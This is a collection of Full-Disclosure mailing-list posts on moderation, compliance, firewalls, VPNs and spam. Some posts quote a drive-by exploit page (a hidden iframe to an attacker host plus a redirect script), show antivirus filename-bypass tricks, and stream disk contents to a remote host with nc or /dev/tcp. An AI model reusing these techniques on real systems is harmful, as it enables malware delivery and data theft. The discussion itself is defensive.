RE: [Full-disclosure] Moderated lists
Why not do a self-regulating list? Something along the lines of keeping track of signup dates and IP addresses, then when a yahoo starts spouting crap, put it to a vote on list. (only members older then xyz date have a vote) If the list's wish is to have the user banned, then so be it... This is all so good in principle but how do you implement it ? And how Does voting take place ? By email to the list ? This way anytime we have To remove someone from the list it will generate a whole lot of useless mail ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Administrivia: Requests for Moderation
Hows about instead of moderation, we try vote-kicking? I support this one, but who decides how many votes are sufficent to get someone kicked ? And what about the Votes that can be automated ? I bet someone will create a huge farm for voting Whenever there is any voting all the results will be swayed Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: 0-day for sale on ebay - New auction!
No offense intended directly to the OP: Honestly, who gives a shit. Is this what this list is to be used for these days? Are there no better OT forums, channels, cups w/string that can be reserved for this type of chatter? For this kind of posts we have a mailing list : Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec And a lot of people from here are on that list Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: McAfee VirusScan vs Metasploit Framework v2.x
Heck they even block WinPcap_3_1.exe the network drivers that are Used by many programs And these are just the drivers. Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: SOX whistleblowers' clause Compliance
See below marc email part Aditya Deshmukh [EMAIL PROTECTED] wrote: If you read the last line in para 6 you will find that anon mailbox is a requirement for SOX compliance. And mailbox was ment for email Michael :) But I think that with a post and some concrete mailbox will be Indeed be far more secure. From: Madison, Marc [mailto:[EMAIL PROTECTED] IANAL, But IMO use an Intranet web page that allows employees to submit anonymous html post to the web server via html. Now if your security policy is pervasive then surely auditing is enabled on all your systems, thus removing any anonymity this would have provided. Have you considered, dare I say, outsourcing? I only say this since part of the requirement calls for the company to provide sufficient anonymity to individuals reporting issues. By the way the SOX whistleblowers requirements have already been challenged in court so there might be precedence on what is sufficient. You must be a mind reader - you just read my mind. And google search shows Some email providers giving out this service for about US$ 89.99. Maybe that is the best solution after all... You don't break your security policy and the auditors are also happy. Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: SOX whistleblowers' clause Compliance
Why cant you use google to find out this ? The same reason you can't use Google and find your answer fuckbag. Are you n3td3v ? *In the para 4* Protecting whistleblowers is an essential component of an ethical and open work environment. No mention of an anon email address here. *In para 6* - this is the one that you want several options for employees to raise concerns, including the option of raising a concern anonymously. Again, not specifying email. A simple drop box in the lunchroom facilitates this. A simple drop box in the lunchroom will not work when you have a client that is big enough to have branches distributed all over the place. Anon Email is the best solution for this - you don't have to manually Check the boxes in all the locations with the headache of keeping the Contents of the box classified. And if you had read my first email *and* comprehended what I had asked you would have not being writing the mail that I am responding to. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Software Firewalls for Windows
Hi list, I've been a firm advocate of Sygate Pro for some time but as Symantec has bought and canned it I'm wondering what you guys would recommend as a replacement. Tiny Firewall 2005 works for both 64 and 32 bit machines And is good - I have been using in since version 2.1.5 And now its 6.5.xx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: Most common keystroke loggers?
How about one-time passwords? Just go ahead and *let* them keylog it all they like; by the time they've snarfed a pw, it's no use any more. (See S/Key for more details.) Please no one time passwords: they are a nightmare to manage Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Support_388945a0 account in Win XP/2003
That is a help and support account that you should disable. Also set very long random password and forget it. I prefer simply delete it. Good choice? But I heard a rumours that this account can be activated remotely without user's aware decision and used for Remote Assistance (e.g. capturing a screen and even controlling input). I would not know about this unless I test it out, but from the top of my mind : you have to start the service for something like this Deleting it might cause problems help and support just deny the account all kinds of privs and it would no longer matter. Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Support_388945a0 account in Win XP/2003
Hello full-disclosurers, Does anyone know anything interesting about Support_388945a0 account which is created by default during Windows XP/2003 installation? I have seen MS technet links, maybe someone knows more about? That is a help and support account that you should disable. Also set very long random password and forget it. Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Support_388945a0 account in Win XP/2003
I has wondered the meaning of support_388945a0 too, but not the meaning of the account, but the meaning of 388945a0. As you may know, it can be interpreted as 4 Bytes hexadecimal number... It's a randomly generated number that generated for this account name Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: SOX whistleblowers' clause Compliance
Seeing how my question was ignored. I will tell you the answer. There is no requirement in SOX to do this. Why cant you use google to find out this ? --- http://www.nonprofitrisk.org/nwsltr/archive/employprac091005-p.htm *In the para 4* Protecting whistleblowers is an essential component of an ethical and open work environment. *In para 6* - this is the one that you want Provide Employees Multiple Avenues to Report Concerns While employees will hopefully feel comfortable raising concerns directly with their supervisors, many employees are reluctant to raise concerns with line management for fear of retaliation, especially where their concerns pertain to unethical or illegal conduct by their line managers. Therefore, nonprofits should provide several options for employees to raise concerns, including the option of raising a concern anonymously. --- If you read the last line in para 6 you will find that anon mailbox is a requirement for SOX compliance. And mailbox was ment for email Michael :) But I think that with a post and some concrete mailbox will be Indeed be far more secure. Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SOX whistleblowers' clause Compliance
How do I create a totally anon mailbox as required by the sox ? How are you doing this in your site ? Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Return of the Phrack High Council
I hope the turkey returns... we need more useless local root exploits... Which can run only when you are root ;) Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Window's O/S
create an folder on deskop and name it as notepad. open internet explorer go to view source code this will open the contents of notepad folder!! Even better: rename any exe to notepad.exe ;) Is this IE being so stupid as to run with a CWD of Desktop and effectively doing a system(notepad)? That'd explain explorer opening up folders called Notepad, and .exe files being run. Bet it also works on MS Word documents (without a .doc extension, probably), and any other magically executable file... Certainly cmd.exe as notepad on the desktop suggests the CWD is your Desktop (so presumably IE's CWD is also Desktop). Are there any other external apps IE is stupid enough to run without a full path prefix? That could be fun too! :-) Thank god I run firefox ! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Window's O/S
this does not work on win2k sp4 srp5 Not sure if you guys are aware of this issue windows XP...!! create an folder on deskop and name it as "notepad". open internet explorer go to view source code this will open the contents of notepad folder!! Yahoo! Music Unlimited - Access over 1 million songs. Try it free. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] SmartCards programming...
Sorry for the top post If you are going to do something like this then RSA cards are the best specially securid It can be implemented almost out of the box and it has great lib support also. From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of khaalel Sent: Wednesday, November 23, 2005 2:12 PM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] SmartCards programming... Hello, I have to achieve a technical project for my french high school... And the subject is about cryptography and smart cards... The goal is to write the programs and all the associated stuff... in order to create a DRM-like system: when an user enter his card, a software check his key (or certificate or...) and if the authentication succeed, the wanted file (document, video, audio...) is open by the software... Yesterday I bought a programmer/writer : the Infinity USB but I wanna know if someone could give me some interresting links about smart card programming (java, basic, .). I already know some things about cryptography but I am a newbie in smart card programming. Wich language I have to learn? Which type of smart cards I have to buy? Which algorithms I can use (DES, RSA, Elliptic Curves, AES...)?? thanks... khaalel Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] another filename bypass vulnerability - from cmd.exe
Was doing some testing [xfocus-AD-051115] Ie Multiple antivirus failed to scan malicous filename bypass vulnerability The system is windows 2000 sp4 srp5 with all other patches upto date. At the command prompt cmd.exe execute the following with the results. I copy and paste from cmd.exe --- E:\TEMPcd test E:\TEMP\testcopy %windir%\system32\calc.exe 1 file(s) copied. E:\TEMP\testren calc.exe calc.exe.zip E:\TEMP\testdir /b calc.exe.zip E:\TEMP\testcalc.exe.zip E:\TEMP\test --- This bring up the calc.exe on the screen. Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: [xfocus-AD-051115]Multiple antivirus failedto scan malicous filename bypass vulnerability
axo Demonstration here: axo Choose a malicious file which would be detected, such as nc.exe, axo rename the file as nc??.exe (?? =Hex C0 D7 BA DC) axo Because these special names are unable directly to input, so if you axo want to run these file, you should use the following way: axo Uses the MS-DOS name specification, we can operate file with Open、 axo Read、Write、 and duplicate。 That means that if the user clicks on it using explorer.exe or iexplorer.exe the file won't be executed because even Microsoft Windows explorer is unable to parse the file? It will be executed because the if windows is not able to Access the long file name then short file name is used to Access the file in +x or execute mode... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] [FLSA-2005:158801] Updated bzip2 packages fixsecurity issues
Could you please stop mailing your Bug-Fix-Reports aka Package xyz updated to the Full*-Mailinglist? I don't find those mailings objectionable. I think this is an appropriate forum. These mailings are not objectionable but when they have their own Mail list so why send a copy to full disclosure ? And most of the security conscious admins are already subscribed to the correct lists. Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] In Sony's Defense Over Virus Writers
ideas for other good bug lists besides full disclosure? VulnWatch: vulnerability disclosure list http://www.vulnwatch.org/ This one is good. There is a discuss list also that you might want to subscribe... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Blocking Skype
Blocking Skype Using Squid and OpenBSD Hey I cant wait to try out this one - this is really intresting one. Very informative writeup. Thanks rootn0de Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Spamcop automated reporting script...
Thanks in advance if you can send in .txt format No need - you can download most of it off the Spamcop web site then write a trivial wrapper. trivial wrapper! No it is not. There is some java script in that form which is stopping the mail reports from being send out, to the Admins, ISP etc... Just to make sure that you have understood clearly I already have A special mailbox on the mail server that forwards the spam to spamcop As an attachment and spamcop responds with a URL that the user has to click to complete the spam reporting. This clicking process is what I am trying to automate. So may I ask Again does any one have something that does this. I am looking at curl Wget and perl as 3 possible tools that can help me with this. So far Wget has failed with the form submission. If anyone has pointer about curl or wget to fill is submitted form examples That would also be good Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] the Sony/BMG virus
If the term future law suits for copyright infringement pops into your head, you wouldn't be alone. Would you give them any real info ? Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Spamcop automated reporting script...
Has anyone got a automated spamcop reporting script? Thanks in advance if you can send in .txt format preferably offlist. Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] RE: Spamcop automated reporting script...
Has anyone got a automated spamcop reporting script? Thanks in advance if you can send in .txt format preferably offlist. I hit the send before I could explain what I wanted to do... I have a spamcop account - and I managed to get the spamcop Url with the reportID to a file using fetchmail + grep Combination. But there is some thing I cannot get working with the Spamcop spam submission form used to complete the spam Reporting. Has anyone made something like this before ? If you can send me that script it would be great.. Anything that works is fine but wget or curl or perl Script would be the best Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] RE: Full-Disclosure Digest, Vol 9, Issue 3
Yes Note to list admins -- add filtering rule to reject messages with Subject: lines matching *Digest, Vol*... Nick, hi... why would you want to filter out the digests? will this eliminate digests from my subscriptioin? He is saying to filter the replies to the digest that have the same name as this one does. And this will not stop digest from your sub. but the replies from users who don't have a clue or wont change the digest subject to something more relevant Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: new IE bug (confirmed on ALL windows)
something else that's different between your two setups? This I would agree, would you both be helpful to send the .dmp file Or aleast windbg.exe output ? Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Funny smtp helo in the logs
I have been seeing this in my logs over all the public smtp server, from all over the net. Anyone know what sends these kinds of helo ? *please* when responding to this mail trim out anything below this -- 124 09/10/2005 09:54:35 HELO -1209283632 --- 250 my.smtp.domain.server 125 09/10/2005 09:55:27 HELO -1209747464 --- 250 my.smtp.domain.server 126 09/10/2005 09:56:01 HELO -1213477808 --- 250 my.smtp.domain.server 129 09/10/2005 09:56:47 HELO -120870 --- 250 my.smtp.domain.server 12A 09/10/2005 09:57:46 HELO -1209957152 --- 250 my.smtp.domain.server 131 09/10/2005 10:02:36 HELO -1218370912 --- 250 my.smtp.domain.server 134 09/10/2005 10:04:55 HELO -1217834696 --- 250 my.smtp.domain.server 135 09/10/2005 10:05:36 HELO -1217676688 --- 250 my.smtp.domain.server 137 09/10/2005 10:06:23 HELO -1218157032 --- 250 my.smtp.domain.server 13A 09/10/2005 10:06:57 HELO -1216091056 --- 250 my.smtp.domain.server 13B 09/10/2005 10:07:35 HELO -1216184136 --- 250 my.smtp.domain.server 13C 09/10/2005 10:08:13 HELO -1217914984 --- 250 my.smtp.domain.server 13D 09/10/2005 10:08:40 HELO -1209896648 --- 250 my.smtp.domain.server 13E 09/10/2005 10:09:43 HELO -1213166296 --- 250 my.smtp.domain.server 13F 09/10/2005 10:10:35 HELO -1213642136 --- 250 my.smtp.domain.server 140 09/10/2005 10:11:16 HELO -1209605968 --- 250 my.smtp.domain.server 006 11/10/2005 08:43:45 HELO -1212929616 --- 250 my.smtp.domain.server 008 11/10/2005 08:44:26 HELO -1214982448 --- 250 my.smtp.domain.server 009 11/10/2005 08:46:07 HELO -1215268000 --- 250 my.smtp.domain.server 00A 11/10/2005 08:47:06 HELO -1214871440 --- 250 my.smtp.domain.server 00B 11/10/2005 08:49:16 HELO -1215063696 --- 250 my.smtp.domain.server 00C 11/10/2005 08:50:12 HELO -1215031936 --- 250 my.smtp.domain.server 00D 11/10/2005 08:50:55 HELO -1213038648 --- 250 my.smtp.domain.server 010 11/10/2005 08:52:09 HELO -1212896896 --- 250 my.smtp.domain.server 014 11/10/2005 08:53:48 HELO -1212788072 --- 250 my.smtp.domain.server 016 11/10/2005 09:00:02 HELO -1213862536 --- 250 my.smtp.domain.server 017 11/10/2005 09:00:44 HELO -1216032616 --- 250 my.smtp.domain.server 005 20/10/2005 17:55:02 HELO -1208757800 --- 250 my.smtp.domain.server 006 20/10/2005 17:55:43 HELO -1208466864 --- 250 my.smtp.domain.server 009 20/10/2005 17:57:38 HELO -1208425264 --- 250 my.smtp.domain.server 00A 20/10/2005 17:58:36 HELO -1209153048 --- 250 my.smtp.domain.server 00B 20/10/2005 17:59:21 HELO -1208221040 --- 250 my.smtp.domain.server 00C 20/10/2005 18:00:16 HELO -1209204568 --- 250 my.smtp.domain.server 00F 20/10/2005 18:01:36 HELO -1209432360 --- 250 my.smtp.domain.server 027 20/10/2005 18:56:40 HELO -1208740112 --- 250 my.smtp.domain.server 21E 25/10/2005 04:52:01 HELO -1208817024 --- 250 my.smtp.domain.server 21F 25/10/2005 04:53:06 HELO -1207974056 --- 250 my.smtp.domain.server 220 25/10/2005 04:55:26 HELO -1208954808 --- 250 my.smtp.domain.server 221 25/10/2005 04:56:07 HELO -1208091560 --- 250 my.smtp.domain.server 222 25/10/2005 04:56:46 HELO -1215556832 --- 250 my.smtp.domain.server 223 25/10/2005 04:57:16 HELO -1208017712 --- 250 my.smtp.domain.server 224 25/10/2005 04:58:03 HELO -1208351328 --- 250 my.smtp.domain.server 227 25/10/2005 04:58:58 HELO -1215519416 --- 250 my.smtp.domain.server 228 25/10/2005 04:59:46 HELO -1208139640 --- 250 my.smtp.domain.server 229 25/10/2005 05:01:10 HELO -1208158800 --- 250 my.smtp.domain.server 22A 25/10/2005 05:01:53 HELO -1208056904 --- 250 my.smtp.domain.server 22C 25/10/2005 05:03:06 HELO -1215816112 --- 250 my.smtp.domain.server 22D 25/10/2005 05:04:31 HELO -1216238864 --- 250 my.smtp.domain.server 22E 25/10/2005 05:05:15 HELO -1208157944 --- 250 my.smtp.domain.server 22F 25/10/2005 05:05:58 HELO -1215473168 --- 250 my.smtp.domain.server 230 25/10/2005 05:06:56 HELO -1208746080 --- 250 my.smtp.domain.server 231 25/10/2005 05:08:36 HELO -1209142096 --- 250 my.smtp.domain.server 232 25/10/2005 05:09:09 HELO -1210509584 --- 250 my.smtp.domain.server 233 25/10/2005 05:10:34 HELO -1210106016 --- 250 my.smtp.domain.server 234 25/10/2005 05:12:10 HELO -1210964032 --- 250 my.smtp.domain.server 235 25/10/2005 05:12:48 HELO -1209218672 --- 250 my.smtp.domain.server 127 26/10/2005 02:42:59 HELO -1212817800 --- 250 my.smtp.domain.server 128 26/10/2005 02:43:32 HELO -1212894352 --- 250 my.smtp.domain.server 129 26/10/2005 02:43:45 HELO -1213176336 --- 250 my.smtp.domain.server 12C 26/10/2005 02:44:19 HELO -1212856784 --- 250 my.smtp.domain.server 12D 26/10/2005 02:45:29 HELO -1212385064 --- 250 my.smtp.domain.server 12E 26/10/2005 02:47:31 HELO -1212692064 --- 250 my.smtp.domain.server 12F 26/10/2005 02:48:06 HELO -1212321816 --- 250 my.smtp.domain.server 130 26/10/2005 02:49:10 HELO -1212623592 --- 250
RE: [Full-disclosure] password vaults-
Sorry for the very noob question, but I'm having very hard times finding such products. What are you going to use that product for. Give us a idea of the end users and how they are going to use this Your details right now are bit on the less side. For what I make out of your post are your looking for RSA secureID ? It is 2 factor auth and is pretty well supported on windows envs.. Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) smime.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Interesting idea for a covert channel or I justdidn't research enough?
I myself use this method to open up the SSH port for a particular IP address. When you try to open a particular URL on my website, you get a 404 because that document doesn't exist. The webserver logs this. A script in the background sees in the log that this happened, and opens up port 22 to the IP address which requested the non-existant URL. Aren't these all different versions of portknocking ? All of them work untill someone outside can figure out the pattern of events - at most I would call this security by obscurity - Trivial to detect but good enough for some low security requirements ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] http://molecularmultimedia.com/ an exploitdistribution point (update2)
FYI, I've had the site www.ok-ok.biz disabled by the ISP, at least it will deny the perps the ability to find out who has been compromised. The molecularmultimedia site is obvioulsy just a front, will see what can be done about this. The site was found after 2 different attempts here are more details http://newvisioncc.org/photo/myphoto.jpg which is html img src=1.jpg iframe src=http://traff.root-soft.com; width=0 height=0/iframe /html end myphoto.jpg And http://traff.root-soft.com is scriptself.location.href='http://molecularmultimedia.com'/script -end index.html And molecularmultimedia.com is the front end to something more sinister Also visiting molecularmultimedia.com with mozilla with the latest version of mozilla With all the patches still caued the trojan to be executed - I found this from the Norton antivir logs It's amazing looking at the page source, there are at least 4 different exploits (I'm still analysing this) encoded into the javascript components of the page. And they are pretty good also - new 0day for mozilla also 1.7.12! Will let you all know if I find anything!... smime.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Cyrilic
I have one user who keeps getting cyrilic spam, but I cant find a rule anywhere. Is anyone else getting this kind of spam?? Welcome to the club of cyrilic spam recipects, we have many existing members The rule that you want to create is this If the message body or header contains Windows-1251 Then * it * == delete it or file it or blacklist it whatever - But doing this will cause all the mails from russia to be **'ed and you have good people like 3APA3A who will also be blocke that are on this list. Maybe you need to create a white list before the black list and keep checking the spam folder logs every now and then. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) smime.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: Careless LEO Forensics and Suicides
As for people committing suicide, I believe those who did commit suicide actually were in possession with intent. If not why commit suicide. I would have fought tooth and nail. I hate to say this but with these kinds of cases where the media crucify the accused even before they are convicted. The media will put anything as *alleged* that will increase their revenues. And mostly the accused cannot hire *good* defense which causes them to loose. And then it becomes a very uphill battle indeed. Look at it this way, if you get convicted of such a crime and get off in the reinvestigation of the case You are already dead - people will shun you, you will not be able to get a job anywhere and most likely you are going to be suspended from you work Position, just because of the accusation In most cases like these the accusation does more damage than anything. How are you going to fight this tooth and nail if you don't have any money and no future source of getting it ? I rest my case here... Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) smime.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
say... a backdoor want to communicate to its server... It can do is, use a trusted internal application to do the job. Suppose; it creates a batch file run the batch file (evil.bat) executes this command this has been going on for years - there are some trojans that create An invisible browser window at the screen center to comm with the Server. This is the reason most firewalls like show you a popup saying the [app-name] trying to connect to [server-name] at [port-number] Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Third issue of the Zone-H Comics
Not if the U.S security services decide to have a war on cyber terror sites. On 9/27/05, str0ke [EMAIL PROTECTED] wrote: KF is right on the dot. There will always be a defacement site. Where is this going ? By your (netdev's) logic: we should shut down all the defacement sites because they promote cracking. Is this not the same as Saying : shut down the newspapers because the newpapers ( or any mass media ) promote terrorism, because they solict newitems. Look at what we will have without free media - something like the great (fire) wall of C* ! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Third issue of the Zone-H Comics
SUICIDE bombers...typically DEAD. Tough to solicit videos from them, and rather pointless to keep a top ten list as they...well...can't exactly do it again. Now the real entertainment begins Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] PGPNet Upgrade path ?
[EMAIL PROTECTED] Wrote : IPSEC has nothing to do with PGP. Also there is really no such thing as a PGP key. PGP uses what ever key scheme you ask it to use. IPSEC is the same way. Both use keys, but are not themselves key standards. OpenVPN similarly can use what ever key scheme you wish. Since it is based on the OpenSSL crupto libs it is very flexible that way. For simple setups you can use pre-shared keys. For more complex setups you can use public/private key pairs of any type that OpenSSL understands. This is the main problem - how do I get PGP key server keys in a format Openssl understand ? And I have implemented CA and ipsec vpn using freeSWAN.org + x.509 patch it works pretty nicely, but here in this case the public/private KEYs are in a different format... IMHO, if OpenVPN does not do what you want then you misunderstand the problem. The problem is very clear : how do I tranlate PGP keys to a format X.509 / openssl can understand ? I havent a solution to this one yet. [EMAIL PROTECTED] Wrote : I know for ipsec VPNs I could use the winxp's builtin But that would require moving all the PGP keys to X.509 certs. Yes, absolutely. For OpenVPN you need to use X509 certs, you will have to rework your whole PKI. However: I have already used openvpn and (free|open|whatever)swan, have created openssl CA with batch files that run both on windows and linux/freebsd/solaris at other sites All these programs are great in own right but I cannot connect the Dots. So if you consider dropping PGP all together, have a look at OpenVPN. This is the last option. If nothing is found then it is going to be openvpn But meanwhile I need a VPN that uses PGP keys for auth that are stored in PGP Key Server, does not matter If it free or paid but if anyone know that There is such a program please let me know Thank you in advance for the time taken to dig out the answers :) Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) smime.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] SA Security Bulletin: Unique attack vectoruncovered during packet analysis
-Original Message- From: [EMAIL PROTECTED] Maybe you should send this to [EMAIL PROTECTED] More info at https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Many of the people at this list are subscribed over at funsec... smime.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] PGPNet Upgrade path ?
What alternatives are there to pgpnet ? Have a look at OpenVPN. Thanks Martijn, but isn`t that a SSL vpn ? And from what I have read about PGPnet I need a IPSEC VPN that uses PGP keys to do the auth. I know for ipsec VPNs I could use the winxp's builtin But that would require moving all the PGP keys to X.509 certs. Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: Full-Disclosure Digest, Vol 7, Issue 25
(on system you want to copy) dd if=/dev/hda | nc otherhost 5000 (on your lappy or whatever) nc -l -p 5000 | dd of=./blah That's a cool way to do it! We always use ssh pipes but the crypto overhead is sometimes unnecessarily slow. A great piece of *nixfoo. I have been using cryptcat always works without slowing down anything Try that sometime... Its pretty good. Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: Full-Disclosure Digest, Vol 7, Issue 25
(on system you want to copy) dd if=/dev/hda | nc otherhost 5000 If you are running bash, then you do not even need netcat: dd if=/dev/hda /dev/tcp/otherhost/5000 This is interesting. Which version of bash are you using ? I havent found it in my man page! Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PGPNet Upgrade path ?
